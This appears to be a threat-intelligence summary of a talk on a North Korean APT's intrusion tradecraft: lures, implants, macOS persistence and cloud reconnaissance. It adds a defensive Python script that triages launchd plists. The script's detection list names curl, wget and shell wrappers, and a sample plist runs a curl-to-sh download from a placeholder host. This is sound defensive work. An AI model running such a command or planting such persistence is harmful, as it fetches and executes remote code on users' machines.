Navigating the LABYRINTH: An In-Depth Examination of Interactive Intrusions by a North Korean APT
2023-10-13 • CrowdStrike •
https://objectivebythesea.org/v6/talks/OBTS_v6_gLongo_bWiley.pdf
Attachments
OBTS_v6_gLongo_bWiley.pdf (3 MB)
LABYRINTH CHOLLIMA is presented as a prolific DPRK threat group tied to intelligence collection, currency generation, and high-profile state-sponsored operations. The slides describe a custom implant set spanning Windows, Linux, macOS, and Android, including MataNet, Dacls, MATA, and the TIEDYE modular framework, whose plugins provide tunnelling, proxying, compression, and upload. The intrusion examples focus on financial and technology organizations in late 2022 and early 2023: initial access through social engineering with backdoored coding challenges or PDF readers, macOS payloads fetched with curl, persistence through LaunchAgents and LaunchDaemons, reconnaissance of AWS environments, shell history, and SSH keys, and staging of data for exfiltration. The material links this targeting to cryptocurrency theft and the expansion of DPRK operations into blockchain-related sectors.
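The macOS persistence described above (LaunchAgents and LaunchDaemons launching curl-fetched payloads) is something a responder can hunt for directly. The following triage script is an added example, not code from the slides or from CrowdStrike: it parses launchd plists, flags Apple-style labels outside /System/Library (where Apple's own jobs live), command lines with download or shell-wrapper tokens, programs in user-writable paths, and RunAtLoad plus KeepAlive combinations. The token list is a heuristic assumption, and the two sample plists are constructed for illustration, not real indicators.

```python
# Added example (not from the OBTS slides): triage launchd plists for the
# persistence traits described above. Token list and sample plists are
# assumptions/constructed for illustration.
import plistlib
from pathlib import Path

# Apple's own launchd jobs ship under /System/Library; a com.apple.* label in
# any other LaunchAgents/LaunchDaemons directory is a classic masquerade.
APPLE_LAUNCH_DIRS = ("/System/Library/LaunchAgents", "/System/Library/LaunchDaemons")

# Heuristic substrings (assumed, not an exhaustive list) that rarely belong in
# a legitimate persisted command line.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "/tmp/", "/private/tmp/", "/var/tmp/",
                     "base64", "osascript", "python -c", "sh -c", "bash -c")
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/", "~")


def command_line(plist: dict) -> list[str]:
    """Reconstruct argv from Program / ProgramArguments (either may be absent)."""
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    program = plist.get("Program")
    if program and (not args or args[0] != program):
        args = [str(program)] + args
    return args


def triage_launch_plist(data: bytes, plist_path: str) -> list[str]:
    """Return human-readable findings for one LaunchAgent/LaunchDaemon plist."""
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # a malformed XML/binary plist is itself worth a look
        return [f"unparsable plist: {exc}"]
    findings = []
    label = str(plist.get("Label", ""))
    argv = command_line(plist)
    cmd = " ".join(argv)

    if label.startswith("com.apple.") and not plist_path.startswith(APPLE_LAUNCH_DIRS):
        findings.append(f"Apple-style label {label!r} outside /System/Library")
    for tok in SUSPICIOUS_TOKENS:
        if tok in cmd:
            findings.append(f"command line contains {tok.strip()!r}")
    if argv and argv[0].startswith(USER_WRITABLE_PREFIXES):
        findings.append(f"program in user-writable location {argv[0]!r}")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive: restarts on login and on exit")
    return findings


def scan_launch_dirs(dirs=None) -> dict[str, list[str]]:
    """Walk the usual persistence directories on a live macOS host."""
    if dirs is None:
        dirs = ["/Library/LaunchAgents", "/Library/LaunchDaemons",
                str(Path.home() / "Library/LaunchAgents")]
    results = {}
    for d in dirs:
        for p in Path(d).glob("*.plist"):
            hits = triage_launch_plist(p.read_bytes(), str(p))
            if hits:
                results[str(p)] = hits
    return results


# Constructed samples (not real IOCs): one masquerading agent, one benign job.
SUSPICIOUS_PLIST = plistlib.dumps({
    "Label": "com.apple.softwareupdate.helper",
    "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://example.invalid/p | sh"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
SUSPICIOUS_PATH = "/Users/dev/Library/LaunchAgents/com.apple.softwareupdate.helper.plist"

BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.backup",
    "Program": "/usr/local/bin/backup",
    "RunAtLoad": True,
})
BENIGN_PATH = "/Library/LaunchDaemons/com.example.backup.plist"

if __name__ == "__main__":
    for path, blob in ((SUSPICIOUS_PATH, SUSPICIOUS_PLIST), (BENIGN_PATH, BENIGN_PLIST)):
        print(path, triage_launch_plist(blob, path) or "clean")
```

On a real host, run `scan_launch_dirs()` with no arguments (or pass a mounted evidence path) and review every plist that returns findings; the RunAtLoad/KeepAlive note is low severity on its own, since legitimate agents use it too, and matters mainly in combination with the other hits.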
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| HASH | 55554944de78734d3ae638288f74df1… | 2023-10-13 | 2023-10-13 |